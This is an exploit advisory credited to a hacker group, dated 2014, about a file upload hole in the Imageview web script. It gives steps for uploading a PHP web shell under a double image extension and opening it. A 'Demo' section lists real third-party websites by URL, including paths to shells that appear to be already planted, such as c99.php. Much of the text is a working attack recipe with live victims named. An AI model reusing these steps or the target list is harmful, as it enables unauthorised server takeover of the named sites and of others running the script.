facebook facebook twitter rss

Imageview File Upload vulnerability

Author: TUNISIAN CYBER , Published: 21-01-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Imageview File Upload vulnerability
[+] Date: 20-01-2014
[+] Category: WebApp
[+] Google Dork: :
[+] Tested on: KaliLinux
[+] Friendly Sites: na3il.com,th3-creative.com
#############################################################
+Exploit:
Imageview Suffers from a File Upload Vulnerability which allows the attacker
to upload a PHP File.

+P.O.C:
127.0.0.1/[PATH]/upload.php
Upload as shell.php.[img extension jpg png gif]
Change it using temper data
Shell Path:
127.0.0.1/[PATH]/albums/shell.php

+Demo:
http://indianayouthballet.com/photos/upload.php
http://indianayouthballet.com/photos/albums/a0a0a.php
http://www.schaefer-swantow.de/Galerie/upload.php
http://www.schaefer-swantow.de/Galerie/albums/c99.php
http://www.rappel-zappel.de/galerie/upload.php

+Fix:
There's no fix from the script's owner but change "upload.php"'s name or path.
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :